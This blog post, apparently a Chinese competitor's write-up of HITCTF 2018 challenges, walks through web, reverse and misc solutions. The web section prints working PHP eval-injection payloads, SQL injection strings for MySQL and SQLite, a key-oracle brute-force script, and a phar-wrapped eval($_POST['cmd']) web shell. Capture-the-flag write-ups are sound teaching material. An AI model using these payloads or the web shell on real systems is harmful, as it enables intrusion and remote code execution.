HITCTF 2018 wp [我真是菜鸟]
2018-02-02 21:05
330 查看
WEB
PHPreading
源码泄露,存在index.php.bak,,解一下base64知道$flag=$_GET['asdfgjxzkallgj8852'];if($flag=='H1TctF2018EzCTF'){die($flag);}die('emmmm');
输入得到flag
BabyEval
看一下泄露了一部分源码<!-- $str=@(string)$_GET['str']; blackListFilter($black_list, $str); eval('$str="'.addslashes($str).'";'); -->
首先查到了如果是在双引号内可以通过这样的方式执行eval
?str=${${phpinfo()}}
然后先输出全局变量看一下,没发现flag,但是看到了黑名单…
然而貌似没什么卵用,继续吧,是不是藏到了index.php中?但是看了以后发现也不是。。。
/?str=${${var_dump(file(chr(46).chr(47).chr(105).chr(110).chr(100).chr(101).chr(120).chr(46).chr(112).chr(104).chr(112)))}}
可以查看index.php,然后就猜测应该还有别的文件了!然后最后在根目录找到了flag的文件
/?str=${${var_dump(glob(chr(47).chr(42)))}}
然后最后费劲巴拉终于解决了问题
/?str=${${var_dump(file(chr(47).chr(49).chr(54).chr(50).chr(57).chr(50).chr(48).chr(57).chr(55).chr(54).chr(100).chr(57).chr(99).chr(48).chr(52).chr(97).chr(99).chr(54).chr(57).chr(101).chr(50).chr(102).chr(52).chr(51).chr(57).chr(50).chr(97).chr(56).chr(99).chr(102).chr(102).chr(98).chr(102).chr(95).chr(102).chr(108).chr(97).chr(103).chr(46).chr(116).chr(120).chr(116)))}}
题目还是不错的。
补充一下我的方法肯能太笨了…补充好做的方法…
小电影
打开题目一看,说是ffmpeg,立马想到去年出的ffmpeg任意文件读取漏洞了,利用file协议的脆弱吧,但是这里不太好的就是不知道文件的路径,猜测flag.txt成功了。具体怎么做,其实就是用人家的脚本…脚本小子…上传的文件名必须是123.avi,最后得到flag如下
BabyInjection
给了源码<?php error_reporting(0); if (!isset($_POST['username']) || !isset($_POST['passwd'])) { echo 'Login and get the flag'; echo '<form action="" method="post">'."<br/>"; echo '<input name="username" type="text" placeholder="username"/>'."<br/>"; echo '<input name="passwd" type="text" placeholder="passwd"/>'."<br/>"; echo '<input type="submit" ></input>'."<br/>"; echo '</form>'."<br/>"; die; } $flag = ''; $filter = "and|select|from|where|union|join|sleep|benchmark|,|\(|\)|like|rlike|regexp|limit|or"; $username = $_POST['username']; $passwd = $_POST['passwd']; if (preg_match("/".$filter."/is",$username)==1){ die("Hacker hacker hacker~"); } if (preg_match("/".$filter."/is",$passwd)==1){ die("Hacker hacker hacker~"); } $conn = mysqli_connect(); $query = "SELECT * FROM users WHERE username='{$username}';"; echo $query."<br>"; $query = mysqli_query($conn, $query); if (mysqli_num_rows($query) == 1){ $result = mysqli_fetch_array($query); if ($result['passwd'] == $passwd){ die('you did it and this is your flag: '.$flag); } else{ die('Wrong password'); } } else{ die('Wrong username'); }
这个貌似是一道实验吧的原题,但是我实在是记不清楚了,最后发现是用with rollup绕过的,但是这里貌似限制了limit的使用,怎么限制呢?这里用了having,半天才想到,真是垃圾!
with rollup的特性在此不讲,和group by组合生成一个列为null的插入查询。然后用having passwd is null限制即可
最后构造如下
注意passwd不要输入内容,貌似因为mysql中的null转换到php中是一个空字符串,如果有输入就一定是“”==“某串”,肯定是错的。
好题好题!
BabyLeakage
这个题目我是有点不懂得,说真的都不知道怎么弄出来了,利用了网站的报错机制,首先显示报错泄露了文件的结构然后构造这个
/news/article/1/1/类似的去爆信息
然后看到了很多不得了的信息啊
然后需要远程登陆一下他的mysql!
mysql> use F1agIsHere; Database changed mysql> describe f -> ; +-------+------+------+-----+---------+-------+ | Field | Type | Null | Key | Default | Extra | +-------+------+------+-----+---------+-------+ | H | text | YES | | NULL | | | I | text | YES | | NULL | | | TC | text | YES | | NULL | | | T | text | YES | | NULL | | | F | text | YES | | NULL | | +-------+------+------+-----+---------+-------+ 5 rows in set (0.02 sec) mysql> describe f; +-------+------+------+-----+---------+-------+ | Field | Type | Null | Key | Default | Extra | +-------+------+------+-----+---------+-------+ | H | text | YES | | NULL | | | I | text | YES | | NULL | | | TC | text | YES | | NULL | | | T | text | YES | | NULL | | | F | text | YES | | NULL | | +-------+------+------+-----+---------+-------+ 5 rows in set (0.02 sec) mysql> describe l; +---------+------+------+-----+---------+-------+ | Field | Type | Null | Key | Default | Extra | +---------+------+------+-----+---------+-------+ | { | text | YES | | NULL | | | C10se_ | text | YES | | NULL | | | Debu91n | text | YES | | NULL | | +---------+------+------+-----+---------+-------+ 3 rows in set (0.02 sec) mysql> describe a; +----------+------+------+-----+---------+-------+ | Field | Type | Null | Key | Default | Extra | +----------+------+------+-----+---------+-------+ | fo_Is_Im | text | YES | | NULL | | | mmp | text | YES | | NULL | | | ort | text | YES | | NULL | | +----------+------+------+-----+---------+-------+ 3 rows in set (0.02 sec) mysql> describe g; +-------+------+------+-----+---------+-------+ | Field | Type | Null | Key | Default | Extra | +-------+------+------+-----+---------+-------+ | 4n7 | text | YES | | NULL | | | } | text | YES | | NULL | | +-------+------+------+-----+---------+-------+ 2 rows in set (0.02 sec)
最终答案
HITCTF{C10se_Debu91nfo_Is_Immmport4n7}
SecurePY
这个题目本来没什么思路,结果找到了相似的题目,这是不是TWCTF2017的题目?呃呃呃,提示是/pycache/,然后想到了这个在 python-web 应用中,当前目录下, .py文件生成的pyc文件会被存储在 pycache文件夹中,并以 .cpython-XX.pyc 为扩展名,其中的 XX 与 CPython 版本有关。比如app.py,其对应的 pyc文件路径为 pycache/app.cpython-35.pyc。我们尝试访问:
http://123.206.83.157:8000/__pycache__/app.cpython-35.pyc
结果还真有东西!然后反编译得到代码
#!/usr/bin/env python # visit http://tool.lu/pyc/ for more information from flask import Flask, request, jsonify, render_template from Crypto.Cipher import AES from binascii import b2a_hex, a2b_hex import os app = Flask(__name__) flag_key = os.environ['KEY'] flag_enc = '9cf742955633f38d9c628bc9a9f98db042c6e4273a99944bc4cd150a0f7b9f317f52030329729ccf80798690667a0add' def index(): return render_template('index.html', flag_enc = flag_enc) index = app.route('/')(index) def getflag(): req = request.json if not req: return jsonify(result = False) if None not in req: return jsonify(result = False) key = None['key'] if len(key) != len(flag_key): return jsonify(result = False) for (x, y) in zip(key, flag_key): if ord(x) ^ ord(y): return jsonify(result = False) cryptor = AES.new(key, AES.MODE_CBC, b'0000000000000000') plain_text = cryptor.decrypt(a2b_hex(flag_enc)) flag = plain_text.decode('utf-8').strip() return jsonify(result = True, flag = flag) getflag = app.route('/getflag', methods = [ 'POST'])(getflag) if __name__ == '__main__': app.run()
这个是简化版本的,首先我们看到加密的密钥要用来作为CBC模式的密钥,那么不出意外是16位。
我们能根据服务器端返回来的信息来判断长度是否符合。我们传入的参数key,服务器端并没有验证它的类型,也就是说我们可以传入一个list,而不是一个字符串。我们为什么可以判断?看下图
如果是长度不匹配那么返回上面红色阔内return false了,如果通过进入下一句,如果json传入null,转换成python就变了
而ord(None)会崩溃返回500!
我们尝试一下
这就说明长度确实是16位的了。
然后我们继续看还有对密钥的判断
这是对每一位进行判断,某一位不通过反汇false,我们可以构造null结尾的数组,如果通过那么就会检测下一组的null,反汇500,如果没通过就会返回false!666直接写程序把
import requests url = "http://123.206.83.157:8000/getflag" key = [None,None,None,None,None,None,None,None,None,None,None,None,None,None,None,None] for index in range(16): for i in range(32,128): key[index] = str(chr(i)) payload = {"key":key} text = requests.post(url,json=payload).text if "500 Internal Server Error" in text : print("".join(key[:index+1])) break if "true" in text: print("".join(key)) exit()
然后就能爆破出密钥了,真的原题要更复杂一些,这里简化了。密钥为
5ecur3pPYpyPYk3y
HITCTF{O0o0o0oOracle_Attttttack_1s_yinQu3S17ing}
BabyWrite
比赛后期一航巨佬都快放出来wp了…貌似就是XNUCA练习赛login,让一航大佬生生搞了个getshell的非常规做法,真心牛逼,这里限制更多了一些首先包含得到源码index.php
<?php if(isset($_GET['page'])){ $file = $_GET['page'].'.php'; include($file); }else{ header("Location: /?page=login"); die(); } ?>
login.php
<!DOCTYPE html> <html> <head> <title>CTF</title> </head> <body> 登陆解锁更多功能 <form action="login.php" method="POST"> 用户名 : <input name="username" placeholder="username"><br/> 密码 : <input name="password" placeholder="password"><br/><br/> <input type="submit" value="登陆"> </form> </body> </html> <?php require_once('config.php'); if(isset($_POST['username']) && isset($_POST['password'])){ $username = $_POST['username']; $password = $_POST['password']; if ($username === "admin" && sha1(md5($password)) === $admin_hash){ echo '<script>alert("Login seccess!");</script>'; }else{ if (isset($_GET['debug'])){ if($_GET['debug'] === 'hitctf'){ $logfile = "log/".$username.".log"; $content = $username." => ".$password; file_put_contents($logfile, $content); }else{ echo '<script>alert("Login failed!");</script>'; } }else{ echo '<script>alert("Login failed!");</script>'; } } }else{ echo '<script>alert("Please input username and password!");</script>'; } ?>
config.php
<?php $admin_hash = "df650edd89a1abfb417124133daf4c103e6d2e97";
尝试了王师傅的zip不行,问了一下说根本没装php zip,换了phar尝试,结果坑到死…mmp
首先是生成就废了很大功夫…真是傻一个单词坑一下午!!!
<?php $phar = new Phar('shell.phar', 0); $phar['shell.php'] = '<?php eval($_POST[\'cmd\']);?>' ; $phar->setStub('<?php __HALT_COMPILER();?>'); ?>
生成文件,注意的是倒数28字节中,前20字节是文件校验和,sha1处理的,我们需要重新计算,因为文件中会加入一个
=>四字节
首先生成的文件是这样的
然后这样输入一下
username=1&password=%3c%3f%70%68%70%20%5f%5f%48%41%4c%54%5f%43%4f%4d%50%49%4c%45%52%28%29%3b%20%3f%3e%0d%0a%37%00%00%00%01%00%00%00%11%00%00%00%01%00%00%00%00%00%00%00%00%00%09%00%00%00%73%68%65%6c%6c%2e%70%68%70%1c%00%00%00%23%35%74%5a%1c%00%00%00%1f%41%8d%73%b6%01%00%00%00%00%00%00%3c%3f%70%68%70%20%65%76%61%6c%28%24%5f%50%4f%53%54%5b%27%63%6d%64%27%5d%29%3b%3f%3e%e5%f4%27%dc%f5%71%41%5a%47%c0%3d%32%d3%68%c6%a2%24%09%81%ff%02%00%00%00%47%42%4d%42
这个时候文件前面会多加5个字节!就是
1 =>(或者下载下来修改后的文件)
我们后面的工作就是加上这五个字节,重新计算一下校验!校验在就是sha1…这个sha1计算是去掉后28字节在计算…
def getSha1(filename): sha1Obj = sha1() with open(filename, 'rb') as f: sha1Obj.update(f.read()) return sha1Obj.hexdigest()
计算后更新一下…
调整后输入
username=1&password=%3c%3f%70%68%70%20%5f%5f%48%41%4c%54%5f%43%4f%4d%50%49%4c%45%52%28%29%3b%20%3f%3e%0d%0a%37%00%00%00%01%00%00%00%11%00%00%00%01%00%00%00%00%00%00%00%00%00%09%00%00%00%73%68%65%6c%6c%2e%70%68%70%1c%00%00%00%23%35%74%5a%1c%00%00%00%1f%41%8d%73%b6%01%00%00%00%00%00%00%3c%3f%70%68%70%20%65%76%61%6c%28%24%5f%50%4f%53%54%5b%27%63%6d%64%27%5d%29%3b%3f%3e%e7%1d%cc%17%64%66%5c%85%c9%4d%3a%7e%e9%2a%8a%cc%61%db%d8%a0%02%00%00%00%47%42%4d%42
哇…好难的题目…但是真是长见识了!!!感谢pr0ph3t师傅,膜膜膜!
BabyQuery
这个题目本来我没做出来,被上一题搞蒙蔽了…是什么Graphsql注入首先是看一下输入
类似json的格式,然后苏我欸的GE======其实是1的base32啦,但是我们进行别的测试的时候发现了长度限制
这就很麻烦了,然后我胡乱改了一下函数名字
还有另一个函数getscorebyyourname,尝试使用它
然后发现没有长度限制啦!但是我组到这里就jj了…
像mysql构造注入试一试…
1' union select '1
妈耶…然后正常注入试试
1' union select databases() where '1
呃呃呃???难道不是mysql,猜测是sqlite3喽
1' union select 1 from sqlite_master where '1
应该没跑了,因为sqlite_master是sqlite的隐藏表
0' union select(select name from sqlite_master where type='table' limit 1,1) where '1
看到了
Secr3t_fl4g
然后
0' union select(select * from Secr3t_fl4g) where '1
膜一发一叶飘零
REVERSE
Baby Android
简单的安卓签到题目得到简单的抑或代码计算结果如下
s1 = '#$%$#!^_^~(:p@_*#######' s2 = 'kmqgwg]Tm3=NE_/4ouKJW@WE^' flag ='' for i in range(len(s1)): flag +=chr(ord(s1[i])^ord(s2[i])) print flag #HITCTF{w3lc0me_t0_hitctf}
网管的麒麟臂
没怎么接触过着实吓了我一跳,直接分析吧,其实最关键的要的是KEY而已c代码
#include <stdio.h> #include <fcntl.h> int key1(){ asm("mov r3, pc\n"); } int key2(){ asm( "push {r6}\n" "add r6, pc, $1\n" "bx r6\n" ".code 16\n" "mov r3, pc\n" "add r3, $0x4\n" "push {r3}\n" "pop {pc}\n" ".code 32\n" "pop {r6}\n" ); } int key3(){ asm("mov r3, lr\n"); } int main(){ int key=0; printf("Enjoy Binnary!"); scanf("%d", &key); if( (key1()+key2()+key3()) == key ){ printf("Congratz!\n"); } else{ printf("Try Harder! XD\n"); } return 0; }
dump值
(gdb) disass main Dump of assembler code for function main: 0x00008d3c <+0>: push {r4, r11, lr} 0x00008d40 <+4>: add r11, sp, #8 0x00008d44 <+8>: sub sp, sp, #12 0x00008d48 <+12>: mov r3, #0 0x00008d4c <+16>: str r3, [r11, #-16] 0x00008d50 <+20>: ldr r0, [pc, #104] ; 0x8dc0 <main+132> 0x00008d54 <+24>: bl 0xfb6c <printf> 0x00008d58 <+28>: sub r3, r11, #16 0x00008d5c <+32>: ldr r0, [pc, #96] ; 0x8dc4 <main+136> 0x00008d60 <+36>: mov r1, r3 0x00008d64 <+40>: bl 0xfbd8 <__isoc99_scanf> 0x00008d68 <+44>: bl 0x8cd4 <key1> 0x00008d6c <+48>: mov r4, r0 0x00008d70 <+52>: bl 0x8cf0 <key2> 0x00008d74 <+56>: mov r3, r0 0x00008d78 <+60>: add r4, r4, r3 0x00008d7c <+64>: bl 0x8d20 <key3> 0x00008d80 <+68>: mov r3, r0 0x00008d84 <+72>: add r2, r4, r3 0x00008d88 <+76>: ldr r3, [r11, #-16] 0x00008d8c <+80>: cmp r2, r3 0x00008d90 <+84>: bne 0x8da8 <main+108> 0x00008d94 <+88>: ldr r0, [pc, #44] ; 0x8dc8 <main+140> 0x00008d98 <+92>: bl 0x1050c <puts> 0x00008d9c <+96>: ldr r0, [pc, #40] ; 0x8dcc <main+144> 0x00008da0 <+100>: bl 0xf89c <system> 0x00008da4 <+104>: b 0x8db0 <main+116> 0x00008da8 <+108>: ldr r0, [pc, #32] ; 0x8dd0 <main+148> 0x00008dac <+112>: bl 0x1050c <puts> 0x00008db0 <+116>: mov r3, #0 0x00008db4 <+120>: mov r0, r3 0x00008db8 <+124>: sub sp, r11, #8 0x00008dbc <+128>: pop {r4, r11, pc} 0x00008dc0 <+132>: andeq r10, r6, r12, lsl #9 0x00008dc4 <+136>: andeq r10, r6, r12, lsr #9 0x00008dc8 <+140>: ; <UNDEFINED> instruction: 0x0006a4b0 0x00008dcc <+144>: ; <UNDEFINED> instruction: 0x0006a4bc 0x00008dd0 <+148>: andeq r10, r6, r4, asr #9 End of assembler dump. (gdb) disass key1 Dump of assembler code for function key1: 0x00008cd4 <+0>: push {r11} ; (str r11, [sp, #-4]!) 0x00008cd8 <+4>: add r11, sp, #0 0x00008cdc <+8>: mov r3, pc 0x00008ce0 <+12>: mov r0, r3 0x00008ce4 <+16>: sub sp, r11, #0 0x00008ce8 <+20>: pop {r11} ; (ldr r11, [sp], #4) 0x00008cec <+24>: bx lr End of assembler dump. (gdb) disass key2 Dump of assembler code for function key2: 0x00008cf0 <+0>: push {r11} ; (str r11, [sp, #-4]!) 0x00008cf4 <+4>: add r11, sp, #0 0x00008cf8 <+8>: push {r6} ; (str r6, [sp, #-4]!) 0x00008cfc <+12>: add r6, pc, #1 0x00008d00 <+16>: bx r6 0x00008d04 <+20>: mov r3, pc 0x00008d06 <+22>: adds r3, #4 0x00008d08 <+24>: push {r3} 0x00008d0a <+26>: pop {pc} 0x00008d0c <+28>: pop {r6} ; (ldr r6, [sp], #4) 0x00008d10 <+32>: mov r0, r3 0x00008d14 <+36>: sub sp, r11, #0 0x00008d18 <+40>: pop {r11} ; (ldr r11, [sp], #4) 0x00008d1c <+44>: bx lr End of assembler dump. (gdb) disass key3 Dump of assembler code for function key3: 0x00008d20 <+0>: push {r11} ; (str r11, [sp, #-4]!) 0x00008d24 <+4>: add r11, sp, #0 0x00008d28 <+8>: mov r3, lr 0x00008d2c <+12>: mov r0, r3 0x00008d30 <+16>: sub sp, r11, #0 0x00008d34 <+20>: pop {r11} ; (ldr r11, [sp], #4) 0x00008d38 <+24>: bx lr End of assembler dump. (gdb)
首先KEY1的关键点
KEY1=0x00008cdc+8 (注意PC值都是先偏移再计算的)
再看KEY2的关键点
bx指令特别说明一下,带状态切换的跳转。最低位为1时,切换到Thumb指令执行,为0时,解释为ARM指令执行。所谓的Thumb模式就是自带的一种16位的指令集。这个时候pc不是+8了而是+4!所以我们下面的计算如下
r6=0x00008cfc+8=0x00008d00 因为最低位是0所以切换到Thumb模式 r3=0x00008d04+4 KEY2=r0=r3=r3+4
最后看一下KEY3,是一样的道理
你说LR寄存器?他的作用是记录子函数的返回地址或者是异常时候当前地址-4,所以这个地方没异常,所以地点是
KEY3=0x00008d80
最后计算三个值和为108400
学习资料的密码
关键函数在于basen这个函数上,密文是llW00ml0lWeml3Weceec3m03c0e!0mc!cW0cl3ecc3lm!0eccllecmmWcmWcmWm3c!l
简单分析一下程序,目标总共67位,67=8*8+3,满足输入长度n%3==1的情况,所以输入的字符串长度为8*3+1=25位,然后写程序把它还原回来
s = 'llW00ml0lWeml3Weceec3m03c0e!0mc!cW0cl3ecc3lm!0eccllecmmWcmWcmWm3c!l' table = 'W3lc0me!' flag='' for i in range(len(s)/8): temp = s[i:i+8] c=((table.index(s[i*8+2])&6)>>1)|(table.index(s[i*8+1])<<2)|(table.index(s[i*8+0])<<5) flag+=chr((int)(c)) c=((table.index(s[i*8+2])&1)<<7)|(table.index(s[i*8+3])<<4)|(table.index(s[i*8+4])<<1)|((table.index(s[i*8+5])&4)>>2) flag+=chr((int)(c)) c=((table.index(s[i*8+5])&3)<<6)|(table.index(s[i*8+6])<<3)|(table.index(s[i*8+7])) flag+=chr((int)(c)) c=((table.index(s[66])&6)>>1)|(table.index(s[65])<<2)|(table.index(s[64])<<5) flag+=chr((int)(c)) print flag
HITCTF{3asy_b4se_3ight:)}
最终难题又没做…
MISC
签到
BaSO4
用pyc反编译器反编译得到代码# Embedded file name: base_32_64.py import base64 import random import os import sys with open('flag.txt', 'r') as file: flag = file.read() for i in range(0, 20): if random.randint(0, 1): flag = base64.b64encode(flag) else: flag = base64.b32encode(flag) with open('flag_encode.txt', 'w') as file: file.write(flag)
反正不是base64就是base32了,倒是不用写脚本,手动尝试即可
HITCTF{Dont_dive_into_misc}
攻击流量分析
其实就是文件目录扫描,然后再后面成功了两个分别是index.php和flag.txt(这里丢了个=),明显我们要的就是第二个了
<?php $data = "\x78\x9c\xcb\xc8\x2c\x49\x2e\x49\xab\xb6\x30\x4d\x32\x48\x4c\x35\x4e\xb4\x48\x34\x37\xb0\x48\xb2\x34\x32\x4f\x4a\x33\x4c\x34\x36\x48\x49\x4b\x33\x4e\x36\x33\x35\x31\xa8\xe5\x02\x00\x18\xcb\x0c\x6c"; print_r(gzuncompress($data)); ?> //hitctf{85b0ae3a8a708b927bf1a30dff3c6540}
use_your_ida
这个题目的套路在MCTF上见过,最后就是利用流程图组成一个图片吧键盘流量分析
这个键盘敲击记录,我不是很会,但是我发现不是很会的东西去看看一航巨佬总是有收获,修改修改一下一航巨佬的代码就能使用了(具体需要看一下流量中的数据)#!/usr/bin/env python import sys import os DataFileName = "usb.dat" presses = [] normalKeys = {"04":"a", "05":"b", "06":"c", "07":"d", "08":"e", "09":"f", "0a":"g", "0b":"h", "0c":"i", "0d":"j", "0e":"k", "0f":"l", "10":"m", "11":"n", "12":"o", "13":"p", "14":"q", "15":"r", "16":"s", "17":"t", "18":"u", "19":"v", "1a":"w", "1b":"x", "1c":"y", "1d":"z","1e":"1", "1f":"2", "20":"3", "21":"4", "22":"5", "23":"6","24":"7","25":"8","26":"9","27":"0","28":"<RET>","29":"<ESC>","2a":"<DEL>", "2b":"\t","2c":"<SPACE>","2d":"-","2e":"=","2f":"[","30":"]","31":"\\","32":"<NON>","33":";","34":"'","35":"<GA>","36":",","37":".","38":"/","39":"<CAP>","3a":"<F1>","3b":"<F2>", "3c":"<F3>","3d":"<F4>","3e":"<F5>","3f":"<F6>","40":"<F7>","41":"<F8>","42":"<F9>","43":"<F10>","44":"<F11>","45":"<F12>","ff":""} shiftKeys = {"04":"A", "05":"B", "06":"C", "07":"D", "08":"E", "09":"F", "0a":"G", "0b":"H", "0c":"I", "0d":"J", "0e":"K", "0f":"L", "10":"M", "11":"N", "12":"O", "13":"P", "14":"Q", "15":"R", "16":"S", "17":"T", "18":"U", "19":"V", "1a":"W", "1b":"X", "1c":"Y", "1d":"Z","1e":"!", "1f":"@", "20":"#", "21":"$", "22":"%", "23":"^","24":"&","25":"*","26":"(","27":")","28":"<RET>","29":"<ESC>","2a":"<DEL>", "2b":"\t","2c":"<SPACE>","2d":"_","2e":"+","2f":"{","30":"}","31":"|","32":"<NON>","33":"\"","34":":","35":"<GA>","36":"<","37":">","38":"?","39":"<CAP>","3a":"<F1>","3b":"<F2>", "3c":"<F3>","3d":"<F4>","3e":"<F5>","3f":"<F6>","40":"<F7>","41":"<F8>","42":"<F9>","43":"<F10>","44":"<F11>","45":"<F12>","ff":""} def main(): # check argv if len(sys.argv) != 2: print "Usage : " print " python UsbKeyboardHacker.py data.pcap" print "Tips : " print " To use this python script , you must install the tshark first." print " You can use `sudo apt-get install tshark` to install it" print "Author : " print " WangYihang <wangyihanger@gmail.com>" print " If you have any questions , please contact me by email." print " Thank you for using." exit(1) # get argv pcapFilePath = sys.argv[1] # get data of pcap os.system("tshark -r %s -T fields -e usb.capdata > %s" % (pcapFilePath, DataFileName)) # read data with open(DataFileName, "r") as f: for line in f: presses.append(line[0:-1]) # handle result = "" for press in presses: Bytes = press.split(":") if Bytes[0] == "00": if Bytes[2] != "00": result += normalKeys[Bytes[2]] elif Bytes[0] == "02": # shift key is pressed. if Bytes[2] != "00": result += shiftKeys[Bytes[2]] else: print "[-] Unknow Key : %s" % (Bytes[0]) print "[+] Found : %s" % (result) # clean the temp data os.system("rm ./%s" % (DataFileName)) if __name__ == "__main__": main()
根据flag格式改一下就行了。
CRYPTO根本没做…菜
相关文章推荐
- hgame-2018 CTFwp(杭电信安)week1
- hgame-2018 CTFwp(杭电信安)week2
- hgame-2018 CTFwp(杭电信安)week3
- 2018信息安全铁三测评wp
- 南邮ctf-web-wp
- WP7下一些图片图标的常识(菜鸟篇)
- 2018HIT普通编程(含历年编程入口)
- 记不起引用类型和值类型,在项目中让我犯糊涂,我真是菜鸟。
- SUSCTF|WP:CrakeMe 一道android逆向
- uva-846 uva上的数据居然这么弱,真是给菜鸟做题用的
- WP 4 i春秋_internetwache-ctf-2016
- 寒假第二周CTFwp——合天CTF
- 2016 icectf dear_diary wp
- 南邮ctf训练平台逆向试题wp
- WordPress Van Ons WP GDPR Compliance插件任意代码执行漏洞(CVE-2018-19207)
- IceCTF 部分WP
- 寒假第一周CTFwp
- CTF菜鸟学习笔记之初始CTF
- 菜鸟第一次wp项目总结
- WP 4 i春秋_百度杯”CTF比赛(九月第一场)